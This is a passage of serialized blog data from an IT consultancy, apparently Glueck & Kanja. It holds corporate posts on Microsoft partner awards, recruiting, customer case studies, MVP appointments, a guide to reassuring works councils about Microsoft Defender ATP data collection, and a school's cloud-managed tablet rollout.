ecosystem is already completely adopted to this new format.",[2816],{"lang":2260,"href":2817},"/blog/workplace/2018/09/intunewin",{"slick":2181,"form":2181},"2018-09-24","/posts/2018-09-25-intunewin",{"title":2617,"description":2807},"posts/2018-09-25-intunewin",[2810,2824,2825,2677,2826,2827],"Intune","Win32","Packaging","Intunewin","6eRl-EdKw2lTwbUC6Q5kRaJmwXvvu66Cc1c8RKJMba0",{"id":2830,"title":2831,"author":2461,"body":2832,"cta":2166,"description":2838,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2960,"moment":2966,"navigation":2181,"path":2967,"seo":2968,"stem":2969,"tags":2970,"webcast":2168,"__hash__":2976},"content_en/posts/2019-06-06-gk-microsoft-partner-of-the-year.md","Glueck & Kanja recognized as winner for 2019 Microsoft Partner of the Year Award",{"type":9,"value":2833,"toc":2957},[2834,2839,2842,2849,2852,2859,2870,2915,2922,2925,2929],[12,2835,2836],{},[251,2837,2838],{},"Glueck & Kanja Consulting AG recognized as 2019 Microsoft Country Partner of the Year for Germany and 2019 Microsoft Global Modern Desktop Partner of the Year.",[12,2840,2841],{},"Glueck & Kanja today proudly announced it has won the 2019 Microsoft Country Partner of the Year Award for Germany and the 2019 Microsoft Global Modern Desktop Award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation and implementation of customer solutions based on Microsoft technology.",[12,2843,2844,2845,2848],{},"Christian Kanja, CEO of Glueck & Kanja, is very pleased about the two awards from Redmond: “It was a bet on the future. Avoiding the complexity of hybrid infrastructures and consequently designing for cloud was the basic idea. Similar to Tesla we believed Microsoft had the right vision but there were concerns in the market and technical problems to solve. Focusing on ",[251,2846,2847],{},"100% Cloud"," we were able to provide convincing answers and prove our success hundreds of thousands of times. With achieving the awards Microsoft has – again – acknowledged that we are on track with our efforts.”",[12,2850,2851],{},"Awards were presented in several categories, with winners chosen from a set of more than 2,900 entrants from 115 countries worldwide. Glueck & Kanja was recognized for providing outstanding solutions and services in Modern Desktop architecture, as well as representing excellent subsidiary engagement in Germany.",[12,2853,2854,2855,2858],{},"The Microsoft ",[251,2856,2857],{},"Country Partner"," of the Year Award honors partners at the country level that have demonstrated business excellence in delivering Microsoft solutions to multiple customers over the past year. This year the joint application of GAB, Glueck & Kanja and PHAT convinced. Over the past two years, the three Microsoft partners based in Munich, Offenbach and Hamburg have consistently implemented Microsoft cloud technologies in many projects with strong standardization and thereby developed a joint '100% Cloud' Blueprint that is unique in the market. The intensive experience exchange leads to a unique level of reliability in the introduction of Microsoft's cloud solutions.",[12,2860,2861,2862,2865,2866,2869],{},"Internationally, Glueck & Kanja was able to further expand its expertise in the field of ",[251,2863,2864],{},"Modern Desktop",". The German company is among the absolute world leaders when it comes to deploying workplaces in the enterprise environment independently of traditional IT infrastructures. Now also known as 'Starbucks Deployment', Glueck & Kanja has made a significant contribution in recent years ",[251,2867,2868],{},"operating modern workplaces completely cloud based"," - including the necessary applications and state-of-the-art security.",[12,2871,2872,2873,2879,2880,1402,2883,2886,2887,1402,2890,2886,2893,1402,2896,2901,2902,2907,2908,2914],{},"But Glueck & Kanja also added several managed services on top of the cloud based architecture. With the release of the new Microsoft Intune package format in October 2018, the company made it possible to offer ",[251,2874,2875],{},[2672,2876,2878],{"href":2791,"rel":2877},[2676],"hundreds of ready-to-deploy packages"," to a diverse customer audience that are interested in removing the barriers of an on-premise bound deployment, in favor of a 100% cloud managed Windows 10 experience. In addition, ",[251,2881,2882],{},"the package management",[2672,2884,2677],{"href":2674,"rel":2885},[2676],"), ",[251,2888,2889],{},"data migration service",[2672,2891,2769],{"href":2767,"rel":2892},[2676],[251,2894,2895],{},"certificate services",[2672,2897,2900],{"href":2898,"rel":2899},"https://scepman.com",[2676],"SCEP"," and ",[2672,2903,2906],{"href":2904,"rel":2905},"https://radius-as-a-service.com",[2676],"RADIUS",") and finally a ",[251,2909,2910],{},[2672,2911,2913],{"href":2912},"en/portfolio/cloud-security-operations-center/","Cloud Security Operations Center"," are provided as a service offer.",[12,2916,2917,2918,2921],{},"“We are honored to recognize Glueck & Kanja of Germany as a Microsoft Country and Microsoft Global Modern Desktop Partner of the Year,” said ",[251,2919,2920],{},"Gavriella Schuster, Corporate Vice President, One Commercial Partner, Microsoft Corp."," “Glueck & Kanja has distinguished itself as an exemplary partner, demonstrating remarkable expertise and innovation to help customers achieve more.”",[12,2923,2924],{},"The Microsoft Partner of the Year Awards recognize Microsoft partners that have developed and delivered exceptional Microsoft-based solutions over the past year.",[41,2926,2928],{"id":2927},"links","Links",[1254,2930,2931,2937,2943,2950],{},[1257,2932,2933],{},[2672,2934,2936],{"href":2935},"/documents/press-releases/201906-gk-PressReleasePOYAward-DE.pdf","Pressemitteilung (deutsch)",[1257,2938,2939],{},[2672,2940,2942],{"href":2941},"/documents/press-releases/201906-gk-PressReleasePOYAward-EN.pdf","Press Release (englisch)",[1257,2944,2945],{},[2672,2946,2949],{"href":2947,"rel":2948},"https://partner.microsoft.com/inspire/awards",[2676],"Microsoft Inspire",[1257,2951,2952],{},[2672,2953,2956],{"href":2954,"rel":2955},"https://company-36087.frontify.com/d/rx2v6DVIyMGz/glueck-kanja-style-guide#/collaterals/microsoft-partner-of-the-year",[2676],"Microsoft Logos",{"title":65,"searchDepth":111,"depth":111,"links":2958},[2959],{"id":2927,"depth":111,"text":2928},{"lang":2171,"categories":2961,"blogtitlepic":2963,"thumb":2964,"socialimg":2965,"customExcerpt":2838},[2962],"Corporate","head-poy-2019","thumb-poy-2019","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/keyvisuals/kv-home-award-2019.jpg","2019-06-06","/posts/2019-06-06-gk-microsoft-partner-of-the-year",{"title":2831,"description":2838},"posts/2019-06-06-gk-microsoft-partner-of-the-year",[2971,2972,2973,2974,2975],"Microsoft","Award","Partner of the Year","Country Partner of the Year","100 Cloud","C-2OGk4tRli4gJItc1mDJRh3UZ01XV24kYbru2BYZZg",{"id":2978,"title":2979,"author":2461,"body":2980,"cta":2166,"description":2984,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2990,"moment":2995,"navigation":2181,"path":2996,"seo":2997,"stem":2998,"tags":2999,"webcast":2168,"__hash__":3001},"content_en/posts/2019-06-28-gk-top-100.md","Glück & Kanja Consulting belongs in the TOP 100",{"type":9,"value":2981,"toc":2988},[2982,2985],[12,2983,2984],{},"Once again Glück & Kanja could convince with its focus on 100% Cloud. The IT company was one of the first German Microsoft partners to recognize the potential of cloud technology and thus opened up a completely new business area: Experts accompany large companies on their way to the cloud - from planning to complete deployment.",[12,2986,2987],{},"Five years ago, the topic of cloud computing was hardly worth mentioning for many IT specialists. Harald Glück and Christian Kanja had little doubt about the worldwide triumphal procession of cloud technology from the very beginning: \"The top innovators recognized early on that its implementation would work best with a combination of Microsoft structures and software developed in-house. \"So we virtually provide the necessary glue,\" says Harald Glück. With this innovative approach, the TOP 100 company was able to convince more and more users to switch off their own servers and rely on Microsoft's cloud solutions instead. \"100 % Cloud\" is now the slogan of the medium-sized company, which has held the highest level of Microsoft partner certification for more than 20 years.",{"title":65,"searchDepth":111,"depth":111,"links":2989},[],{"lang":2171,"categories":2991,"blogtitlepic":2992,"thumb":2993,"socialimg":2994,"customExcerpt":2984},[2962],"head-top100award","thumb-top100award","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/thumb-top100award-bw.jpg","2019-06-28","/posts/2019-06-28-gk-top-100",{"title":2979,"description":2984},"posts/2019-06-28-gk-top-100",[3000,2972],"Top 100","-F8rCcJJIXff5ZT6y37bDRvft-LNq-Q-AEScb58mk-M",{"id":3003,"title":3004,"author":2415,"body":3005,"cta":2166,"description":3076,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3077,"moment":3083,"navigation":2181,"path":3084,"seo":3085,"stem":3086,"tags":3087,"webcast":2168,"__hash__":3091},"content_en/posts/2019-07-16-new-employees.md","Seven new employees in the first half-year. We say Welcome",{"type":9,"value":3006,"toc":3074},[3007,3013,3036,3043,3049,3055,3064,3071],[12,3008,3009,3010,1013],{},"With the success of our 100% cloud strategy, we face the challenge of growing our teams in a healthy way. In the past it was not easy for us as an IT consulting company to make our company known on the job market. Many applicants told us that they came across Glück & Kanja rather by chance, as we were often not noticed in the multitude of job portals and lists of job offers. In autumn 2018 we started our ",[251,3011,3012],{},"\"Desire for change?\" campaign",[12,3014,3015,3016,3019,3020,805,3025,2901,3030,3035],{},"What was important to us? We knew that we had a lot to offer interested people: very exciting and future-oriented topics, an attractive working atmosphere with great people, and a relaxed and appreciative corporate culture. In the first step we therefore prepared picture worlds and texts on our career page in such a way that these advantages were clearly shown to advantage. We also decided to make our profiles on XING, and thus also on kununu, more attractive in order to ",[251,3017,3018],{},"actively promote our employer branding",". In addition, we used social networks such as ",[2672,3021,3024],{"href":3022,"rel":3023},"https://www.xing.com/company/glueckkanja",[2676],"XING",[2672,3026,3029],{"href":3027,"rel":3028},"https://www.linkedin.com/company/glueckkanja-gab",[2676],"LinkedIn",[2672,3031,3034],{"href":3032,"rel":3033},"https://twitter.com/glueckkanja",[2676],"Twitter"," to make the classic job postings more visible.",[12,3037,3038,3039,3042],{},"In the subsequent interviews we received good feedback on our ",[251,3040,3041],{},"company presentation on kununu",", especially on the ratings. Let me say it right away: We have no influence on the ratings! However, we have noticed that kununu is now often used by applicants to get a better picture of what it looks like behind the scenes of a company. Therefore we ask our new employees if they would give us an evaluation after the first months of settling in. We also ask candidates to evaluate us during the application process.",[12,3044,3045],{},[2642,3046],{"alt":3047,"src":3048},"Employees in the kitchen","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/collage-new-employees.jpg",[12,3050,3051,3054],{},[251,3052,3053],{},"Our application procedure"," has been simple and clearly structured for many years: After a first contact has been established, we arrange a telephone interview of about one hour. This will clarify initial questions from both sides and we get to know each other better. We've always been on first-name terms with Glück & Kanja, as is customary between Microsoft and its partners. It is an important part of our company culture, and we only have positive experiences with it. After the telephone interview, we arrange a meeting at our office in Offenbach and make a decision as soon as possible. It is important to us that all candidates know what awaits them at the individual stations and what steps will follow until they actually start work and during the onboarding period.",[12,3056,3057,3058,3063],{},"It is often difficult to look into a company from the outside and assess whether it is really as good as it seems. Our numerous videos on ",[2672,3059,3062],{"href":3060,"rel":3061},"https://www.youtube.com/user/glueckkanja",[2676],"YouTube"," have proven to be helpful. Since 2016, we have had our employees report on various topics in live webcast format. Through these clips, interested parties can get to know the topics, people and culture at Glück & Kanja directly. In addition, we provide a concrete picture of the topics in which applicants will be working in the future. Of course we also invite new employees to participate in the creation of blogs, magazine articles and webcasts.",[12,3065,3066,3067,3070],{},"Onboarding usually begins one month before the actual start date. It is important to us that new \"GKlers\" have the opportunity to get to know us a little beforehand and learn about the topics we are working on. All new employees have access to ",[251,3068,3069],{},"also our trainings",". Some of them already took part in the training courses before their official start date. This enabled us to establish contact with colleagues and teams of specialists at an early stage. We are naturally very pleased about such a commitment.",[12,3072,3073],{},"Seven new employees in the last six months - we have never grown so fast in such a short time! Glück & Kanja welcomes all new colleagues. It is important to us that our new team members feel comfortable in our company and find their way around quickly and easily. Also in the second half of the year we would like to find many motivated people who are interested in creating cloud solutions with us. Talk to us!",{"title":65,"searchDepth":111,"depth":111,"links":3075},[],"With the success of our 100% cloud strategy, we face the challenge of growing our teams in a healthy way. In the past it was not easy for us as an IT consulting company to make our company known on the job market. Many applicants told us that they came across Glück & Kanja rather by chance, as we were often not noticed in the multitude of job portals and lists of job offers. In autumn 2018 we started our \"Desire for change?\" campaign.",{"lang":2171,"categories":3078,"blogtitlepic":3079,"thumb":3080,"socialimg":3081,"customExcerpt":3082},[2962],"head-new-employees","thumb-new-employees","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-new-employees.jpg","Glück & Kanja faces the challenge of allowing the teams of specialists to grow in a healthy way. Through active employer branding, we have managed to stand out from the crowd and recruit seven new employees in the first half of the year.","2019-07-16","/posts/2019-07-16-new-employees",{"title":3004,"description":3076},"posts/2019-07-16-new-employees",[3088,3089,3090],"Employer Branding","Top Employer","Recruiting","YmEn3qf2wllEklC7IvoszMTdQSpnsDBoaJH7mxe34gQ",{"id":3093,"title":3094,"author":2461,"body":3095,"cta":2166,"description":3099,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3119,"moment":3124,"navigation":2181,"path":3125,"seo":3126,"stem":3127,"tags":3128,"webcast":2168,"__hash__":3132},"content_en/posts/2019-08-31-casestudy-uniper.md","Uniper's Unique Journey to 100% cloud",{"type":9,"value":3096,"toc":3117},[3097,3100,3103,3106,3109],[12,3098,3099],{},"In the rapidly changing energy industry, the energy company Uniper wanted more operational agility--without sacrificing security and stability. With the introduction of Microsoft 365, Uniper transformed its workplace culture and enhanced collaboration and security across the company to help meet the needs of the European energy future.",[12,3101,3102],{},"Uniper is an international energy company with approximately 11,000 employees. It supports energy conversion by ensuring a stable supply regardless of environmental conditions and helping to bridge the transition from carbon to renewable energy. It's a complex mix of demands, changes, and challenges, and Uniper meets them with creativity, agility, innovative thinking, and powerful technology.",[12,3104,3105],{},"\"With power plants with a net capacity of approximately 34 gigawatts and operations in more than 40 countries, Uniper is one of the largest global power generators, and we are committed to providing a stable energy supply and supporting energy transition,\" said Hans Pezold, senior vice president of Information Technology at Uniper.\n\"To achieve this, we had to become more efficient and digitize our business.\"",[12,3107,3108],{},"In partnership with Glück and Kanja, Uniper has launched a complete Microsoft 365 solution that combines Office 365, Windows 10 and Enterprise Mobility + Security to create a more effective, collaborative, secure and consistent work environment.",[12,3110,3111,3112,1265],{},"The complete story in words and pictures can be found ",[2672,3113,3116],{"href":3114,"rel":3115},"https://customers.microsoft.com/en-us/story/748199-uniper-energy-microsoft365",[2676],"here",{"title":65,"searchDepth":111,"depth":111,"links":3118},[],{"lang":2171,"categories":3120,"blogtitlepic":3121,"thumb":3122,"socialimg":3123,"customExcerpt":3108},[2962],"head-uniper-casestudy","thumb-uniper-casestudy","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-uniper-casestudy.jpg","2019-08-31","/posts/2019-08-31-casestudy-uniper",{"title":3094,"description":3099},"posts/2019-08-31-casestudy-uniper",[3129,2975,2971,3130,3131],"Casestudy","Customer","Success Story","lndiWQeL4LrtUISKWG1ivafn4c1d54iCSIOax95jbLM",{"id":3134,"title":3135,"author":2461,"body":3136,"cta":2166,"description":3177,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3178,"moment":3183,"navigation":2181,"path":3184,"seo":3185,"stem":3186,"tags":3187,"webcast":2168,"__hash__":3189},"content_en/posts/2019-12-15-neue-gk-mvps.md","Two MVPs for Glück & Kanja",{"type":9,"value":3137,"toc":3175},[3138,3152,3172],[12,3139,3140,3141,3146,3147,1013],{},"Oliver Kieselbach is MVP for Enterprise Mobility for the second time in a row. As a cloud architect and consultant, Oliver specializes in the architecture, operation and deployment of Microsoft cloud infrastructure components. His contributions to the community can be found ",[2672,3142,3145],{"href":3143,"rel":3144},"https://oliverkieselbach.com/",[2676],"in his blog",". You can follow him on Twitter at ",[2672,3148,3151],{"href":3149,"rel":3150},"https://twitter.com/okieselb",[2676],"@okieselb",[12,3153,3154,3155,3160,3161,3166,3167,1013],{},"Jan Geisbauer was awarded the Microsoft MVP for Cloud and Datacenter Management with focus on Enterprise Security for the first time. His blog \"Modern Security in a Cloud World\" can be found at ",[2672,3156,3159],{"href":3157,"rel":3158},"https://emptydc.com/author/jangeisbauer/",[2676],"https://emptydc.com/",". Together with his colleague Marco Scheel, he also produces the ",[2672,3162,3165],{"href":3163,"rel":3164},"https://hairlessinthecloud.wordpress.com/",[2676],"Hairless in the Cloud"," podcast with its content about the Microsoft Cloud. You can follow him on Twitter at ",[2672,3168,3171],{"href":3169,"rel":3170},"https://twitter.com/janvonkirchheim",[2676],"@janvonkirchheim",[12,3173,3174],{},"We are happy that they are part of the Glück & Kanja team!",{"title":65,"searchDepth":111,"depth":111,"links":3176},[],"Oliver Kieselbach is MVP for Enterprise Mobility for the second time in a row. As a cloud architect and consultant, Oliver specializes in the architecture, operation and deployment of Microsoft cloud infrastructure components. His contributions to the community can be found in his blog. You can follow him on Twitter at @okieselb.",{"lang":2171,"categories":3179,"blogtitlepic":3180,"socialimg":3181,"customExcerpt":3182},[2962],"head-two-mvps","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-kieselbach-mvp.jpg","Oliver Kieselbach and Jan Geisbauer have been appointed **Microsoft Most Valuable Professionals (MVP)**. The Microsoft MVP Award recognizes outstanding technical expertise and achievements for the community. Once again, the extraordinary commitment and high level of competence of the two experts has proven itself.","2019-12-15","/posts/2019-12-15-neue-gk-mvps",{"title":3135,"description":3177},"posts/2019-12-15-neue-gk-mvps",[3188,3088],"MVP","YFz4CMKRp9sNSv37QdpMbXZoJeEHGsj2bkJeNM2cdPk",{"id":3191,"title":3192,"author":3193,"body":3195,"cta":2166,"description":3384,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3385,"moment":3390,"navigation":2181,"path":3391,"seo":3392,"stem":3393,"tags":3394,"webcast":2168,"__hash__":3398},"content_en/posts/2020-03-02-mdatp.md","Put regulation fears to rest when deploying Microsoft Defender ATP",[2209,3194],"Heike Ritter (Microsoft)",{"type":9,"value":3196,"toc":3376},[3197,3206,3209,3215,3218,3221,3229,3232,3239,3242,3245,3249,3252,3255,3258,3267,3270,3273,3277,3280,3312,3319,3323,3326,3343,3349,3353,3356,3360,3363,3367,3370,3373],[12,3198,3199,3200,3205],{},"The power of ",[2672,3201,3204],{"href":3202,"rel":3203},"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection",[2676],"Microsoft Defender Advanced Threat Protection (ATP)"," lies in the intelligent analysis of the data. Using sophisticated detection and protection technologies, Microsoft Defender ATP maps known and unknown behaviors (such as writing to a certain point in the registry or trying to access the LSASS process) to data found on the clients and raises alerts as it observes suspicious activity.",[12,3207,3208],{},"For data to be analyzed, Microsoft Defender ATP must collect this data in real-time. It acts like an airplane ‘flight recorder’, which keeps track of important flight data to facilitate the investigation of accidents and incidents.",[12,3210,3211,3212,1013],{},"In some countries, data collection can be a cause for concern. Organizations and roles such as German Workers Council and Data Protection Officers (DPO) want to know exactly what happens with the data found on an end-user’s computer. One of the main concerns of the Workers Council is that such technologies must ",[251,3213,3214],{},"not be used to analyze user performance",[12,3216,3217],{},"To address these concerns, it’s critical for the Workers Council and Data Protection Officers to understand what user data is being collected, how the user data is being analyzed, and how its protected.",[12,3219,3220],{},"In this blog post, we’ll guide you in:",[1254,3222,3223,3226],{},[1257,3224,3225],{},"Directing the conversation around the critical role that Microsoft Defender ATP plays in protecting organizations and why it’s important to deploy",[1257,3227,3228],{},"Providing the Workers Council and Data Protection Officers with definitive information about the data that the service collects",[12,3230,3231],{},"Ultimately, the goal is to equip you with a clear path to address regulation concerns and help organizations see the value of deploying Microsoft Defender ATP.",[12,3233,3234,3235,3238],{},"First: ",[251,3236,3237],{},"be as honest and transparent as possible",". While this should be a general rule for trusted collaboration, it is especially important in this situation. From the non-IT side, all these solutions appear to be black holes – completely unknown and very suspicious.",[12,3240,3241],{},"Ensure that the Workers Council understands that modern security platforms, such as Microsoft Defender ATP, do not report on a user’s productivity, working hours, or time spent doing actual work. Help them understand the fact that security / IT teams are not using the data to perform such analyses, so that you can gain their trust.",[12,3243,3244],{},"The lack of transparency and ambiguity can potentially make the black hole experience worse for them, so it’s important that you’re completely honest and clear.",[186,3246,3248],{"id":3247},"role-of-microsoft-defender-atp-in-protecting-organizations","Role of Microsoft Defender ATP in protecting organizations",[12,3250,3251],{},"Explain to them how Microsoft Defender ATP works in a non-IT way. You can use the following examples to convey the critical role that Microsoft Defender ATP plays in protecting organizations and why it’s important to deploy.",[12,3253,3254],{},"Here are two examples:",[12,3256,3257],{},"Microsoft Defender ATP brings two main innovations to improve a company's security posture.",[3259,3260,3261,3264],"ol",{},[1257,3262,3263],{},"In the past, antimalware software mainly was able to detect things it knew. For example, if a piece of malware looked the same as something that was already identified as malicious and detected before - it was clear: it's malware. It was as easy as this. Attackers have evolved over time and new malware appears completely different from one computer to another. For companies, that means they need new solutions with new detection techniques - so called behavioral analysis. These techniques do not need to know how malware looks like, rather, it looks at how it behaves. That’s what Microsoft Defender ATP does, it looks at behaviors and raises alerts for suspicious activities.",[1257,3265,3266],{},"One of the biggest entryways into our computers for malware are still vulnerabilities on unpatched systems. Everyone continuously hears: patch your systems and you are good. The problem here is that most companies do not know what software is installed on their clients and the associated vulnerabilities that software has. Microsoft Defender ATP reports on that and tells you exactly how vulnerable the computers are in your organization and what you should patch where.",[12,3268,3269],{},"To reiterate: To be able to provide this analysis and reporting, Microsoft Defender ATP needs to collect the appropriate data.",[12,3271,3272],{},"Presenting this information helps the Workers Council and Data Protection Officers understand how Microsoft Defender ATP works and why it is necessary to collect data.",[186,3274,3276],{"id":3275},"definitive-information-about-the-data-being-collected","Definitive information about the data being collected",[12,3278,3279],{},"The next thing you should explain is the exact data being collected:",[1254,3281,3282,3285,3288,3291,3294,3297,3300,3303,3306,3309],{},[1257,3283,3284],{},"Registry Events",[1257,3286,3287],{},"File Creation Events",[1257,3289,3290],{},"Network Events",[1257,3292,3293],{},"Logon Events",[1257,3295,3296],{},"Installed Application Information",[1257,3298,3299],{},"Machine Information",[1257,3301,3302],{},"Kernel Events",[1257,3304,3305],{},"Memory Events",[1257,3307,3308],{},"Hardware Changes",[1257,3310,3311],{},"System API Calls",[12,3313,3314,3315,1013],{},"More information about compliance can be found ",[2672,3316,3116],{"href":3317,"rel":3318},"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/data-storage-privacy",[2676],[186,3320,3322],{"id":3321},"actions-that-can-be-taken","Actions that can be taken",[12,3324,3325],{},"To dig deeper into a security issue or to respond to it, designated security analysts / security operations members / administrators (depending on their permission) can take the following actions on computers:",[1254,3327,3328,3331,3334,3337,3340],{},[1257,3329,3330],{},"Isolate machine (User gets notified - no connection to the Internet and the local network possible)",[1257,3332,3333],{},"Restrict app execution (only certified apps can run afterwards)",[1257,3335,3336],{},"Trigger an antivirus scan",[1257,3338,3339],{},"Collect an investigation package (collect more data from the client such as a list of all running processes, security event log, etc)",[1257,3341,3342],{},"Initiate a live response session (remote command shell)",[12,3344,3345,3348],{},[251,3346,3347],{},"Important",": Every response action is logged and will be audited in the Action center.",[186,3350,3352],{"id":3351},"data-location-and-retention","Data location and retention",[12,3354,3355],{},"Microsoft Defender ATP data is stored for a maximum of 180 days and can be stored in the United States, United Kingdom, or Europe. The customer organization defines the data storage duration and the data location during the initial setup. Check with your CISO – they usually want to keep the data as long as possible.",[186,3357,3359],{"id":3358},"data-access","Data access",[12,3361,3362],{},"Make it clear that only a dedicated and educated group of security people has access to this data. This group can also be asked to sign a statement that explains that they can only use the data for threat hunting and not for \"employee performance monitoring\" or the like.",[186,3364,3366],{"id":3365},"maintaining-transparency-and-collaboration","Maintaining transparency and collaboration",[12,3368,3369],{},"Another good way to maintain transparency is to continue the communication and collaboration with the Workers Council and Data Protection Officers as soon as Microsoft Defender ATP is deployed. Continuously report on security incidents and your response to those incidents. Don’t drop them back into the black hole they feared at the beginning. Keep being transparent and include them to maintain their trust.",[12,3371,3372],{},"Also, there might be other departments in your organization that have the same interests as you – depending on what your role is – team up with the others! Include IT Security, 'Information Security' (or the CISO) and ask them to join meetings around these topics, to have a lively discussion in which all interests of the organization are covered.",[12,3374,3375],{},"Please let us know how your experience with your Data Protection Officers or the Workers Council is or was and share your recommendation to help them overcome their regulatory concerns.",{"title":65,"searchDepth":111,"depth":111,"links":3377},[3378,3379,3380,3381,3382,3383],{"id":3247,"depth":329,"text":3248},{"id":3275,"depth":329,"text":3276},{"id":3321,"depth":329,"text":3322},{"id":3351,"depth":329,"text":3352},{"id":3358,"depth":329,"text":3359},{"id":3365,"depth":329,"text":3366},"The power of Microsoft Defender Advanced Threat Protection (ATP) lies in the intelligent analysis of the data. Using sophisticated detection and protection technologies, Microsoft Defender ATP maps known and unknown behaviors (such as writing to a certain point in the registry or trying to access the LSASS process) to data found on the clients and raises alerts as it observes suspicious activity.",{"lang":2171,"categories":3386,"blogtitlepic":3387,"socialimg":3388,"customExcerpt":3389},[2176],"head-mdatp","https://res.cloudinary.com/c4a8/image/upload/blog/heads/head-mdatp.jpg","Microsoft Defender ATP also protects Microsoft 365 users against modern threats. To do this, the data on the end devices must be captured in real-time. This brings works council and data protection officers to the agenda. Be as honest and transparent as possible.","2020-03-02","/posts/2020-03-02-mdatp",{"title":3192,"description":3384},"posts/2020-03-02-mdatp",[2176,3395,3396,3397],"Defender","ATP","Microsoft 365","03mqfW_I7hMZ0SPVdEQHOAEFjxZcQlbYidFaU87Zro8",{"id":3400,"title":3401,"author":3402,"body":3403,"cta":2166,"description":3409,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3523,"moment":3527,"navigation":2181,"path":3528,"seo":3529,"stem":3530,"tags":3531,"webcast":2168,"__hash__":3534},"content_en/posts/2020-03-18-modern-workplace-at-school.md","Future Workplace at School",[2331],{"type":9,"value":3404,"toc":3521},[3405,3410,3427,3449,3458,3465,3503,3506,3513],[12,3406,3407],{},[251,3408,3409],{},"Our Future Workplace Client is already used by more than 200,000 users for their daily work, and our customers rely on cloud management and modern working environments. How is the concept actually suitable for schools? Very well indeed - as the Neuffen secondary school shows with its tablet classes. Find out how the Microsoft cloud is revolutionizing digital learning and making device management scalable and flexible at the same time.",[12,3411,3412,3413,3416,3417,3420,3421,3426],{},"Our ",[251,3414,3415],{},"100% cloud strategy"," points the way to the future and says goodbye to maintenance-intensive local or hybrid IT environments. It is precisely this change in strategy that we are presenting to our customers and assisting them in their transition to this new world. In the 2016/2017 school year, the ",[251,3418,3419],{},"Neuffen secondary school"," also faced the question of choosing an administration environment for the new tablet classes: classic on-premises or cloud-based. The decision to use Intune - part of the ",[2672,3422,3425],{"href":3423,"rel":3424},"https://www.microsoft.com/en-US/security/business/endpoint-management/microsoft-intune",[2676],"Microsoft Intune"," - was made.",[12,3428,3429,3432,3433,3436,3437,3440,3441,3444,3445,3448],{},[251,3430,3431],{},"A few details about the project in advance:"," In a pilot test lasting a couple of years, the Neuffen secondary school is equipping complete classes with convertible tablets. Started in the school year 2016/2017, a second tablet class followed in 2018/2019 and a third one in this school year (2019/2020). Students in the eighth grade will be given ",[251,3434,3435],{},"their own tablet",", which they can use ",[251,3438,3439],{},"at school and at home"," until they graduate - similar to the mobile devices used by employees in a company. The school consciously decided against a \"suitcase solution\" in which tablets are only used occasionally in certain teaching units.This is the only way that the students ",[251,3442,3443],{},"learn how to use new media in a sustainable way"," and then use them sensibly. Their everyday use also prepares them well for their later professional life. Thanks to the digital pen, handwriting is not neglected and the students continue to use their notebooks - only digitally. Anyone who has forgotten their tablet at home or has not loaded it sufficiently can still participate with pen and paper as normal: The tablet serves as a supplement to normal lessons. ",[251,3446,3447],{},"An optimal mix of digital and analogue"," - one of the basics of the tablet concept at the Neuffen secondary school. The Windows 10 operated devices are equipped with various apps and the latest Office applications. E-mail, calendar, Teams, OneDrive and Co. are used for communication and file exchange. Various web-based learning offers and possibilities for collaboration (e.g. whiteboard) round up the classes effectively. The first tablet class has already successfully completed its graduation.",[12,3450,3451,3455],{},[2642,3452],{"alt":3453,"src":3454},"Thanks to the digital pen, handwriting is not neglected","https://res.cloudinary.com/c4a8/image/upload/blog/pics/img-handschrift.jpg",[3456,3457,3453],"em",{},[12,3459,3460,3461,3464],{},"As mentioned in the beginning, the Neuffen secondary school ",[251,3462,3463],{},"decided to use Intune respectively the Future Workplace concept"," to manage the tablets. With good reason: While companies of comparable size have their own IT departments or employ heavily booked IT consultants, the situation at schools is usually different. Often the IT is in the hands of teachers who look after the school network and the like in addition to normal classes. There is simply a lack of resources to keep highly complex IT systems up and running - this is where the cloud comes in. Managing servers, applying patches and replacing hardware are all a thing of the past. While systems like Intune still need to be designed and managed, you can focus on the essentials and be fully scalable. The time-consuming planning and acquisition of hardware is eliminated.",[12,3466,3467,3470,3471,3476,3477,3482,3483,3488,3489,3492,3493,3496,3497,3502],{},[251,3468,3469],{},"The device management in detail:"," The tablets are put into operation together with the students and teachers. Thanks to ",[2672,3472,3475],{"href":3473,"rel":3474},"https://docs.microsoft.com/en-us/windows/deployment/windows-autopilot/windows-autopilot",[2676],"AutoPilot"," directly in the branding of the school. After a short registration and the setup of ",[2672,3478,3481],{"href":3479,"rel":3480},"https://www.microsoft.com/de-de/security/business/identity/mfa",[2676],"MFA",", the devices get the desired configuration and software or apps. Everything else is configured with various Intune profiles for teaching purposes. Thanks to ",[2672,3484,3487],{"href":3485,"rel":3486},"https://products.office.com/de-de/business/office",[2676],"Office 365"," in the background, users have direct access to various services such as ",[251,3490,3491],{},"Exchange Online, OneDrive for Business, the office applications and Teams",". To ensure seamless operation, ",[251,3494,3495],{},"Azure AD, Windows Update for Business, Windows Hello, Delivery Optimization, Windows Defender and others"," also work under the hood. In a very short time, the devices are ready for use in the classroom. From now on the tablets can be updated and maintained centrally. Further complex software packages are installed thanks to ",[2672,3498,3501],{"href":3499,"rel":3500},"https://realmjoin.com/",[2676],"Glück and Kanja's RealmJoin",". Support can also be easily provided by means of our integrated LAPS and remote maintenance solution.",[12,3504,3505],{},"The school has already recognised that this concept has even more potential. Now the normal school network with the pool rooms and all other clients will be onboarded to the new administration. Thanks to the almost infinite scalability of Microsoft Endpoint Management, there is no limit to what 